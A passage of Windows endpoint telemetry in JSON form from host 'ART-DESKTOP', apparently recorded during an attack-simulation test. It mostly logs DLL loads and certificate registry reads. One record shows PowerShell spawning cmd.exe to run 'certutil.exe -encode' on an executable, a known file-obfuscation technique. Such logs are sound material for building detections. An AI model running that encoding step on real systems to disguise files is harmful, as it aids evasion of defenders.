"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "pdh.dll", - "image_path": "C:\\Windows\\System32\\pdh.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "perfos.dll", - "image_path": "C:\\Windows\\System32\\perfos.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573491520000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573494790000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573494790000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": 
"HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573494950016, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573494950016, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573494950016, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573494950016, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 204, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 
131883573496150000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 204, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573496040000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 204, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573496040000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 204, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573496040000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 204, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573496040000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 204, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573496200016, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" - }, - { - "command_line": "certutil.exe -encode c:\\file.exe file.txt", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 904, 
- "ppid": 204, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "subtype": "create", - "timestamp": 131883573496310000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}", - "unique_ppid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496360000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573496360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573496360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": 
"{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": 
"image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496520000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "certutil.exe", - "image_path": "C:\\Windows\\System32\\certutil.exe", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496360000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496670000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17134.441_none_f952a0bb30955e96\\comctl32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496670000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - 
}, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496670000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\System32\\setupapi.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - 
"timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "netapi32.dll", - "image_path": "C:\\Windows\\System32\\netapi32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496980000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573497140000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - 
}, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573497140000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "certcli.dll", - "image_path": "C:\\Windows\\System32\\certcli.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496670000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software 
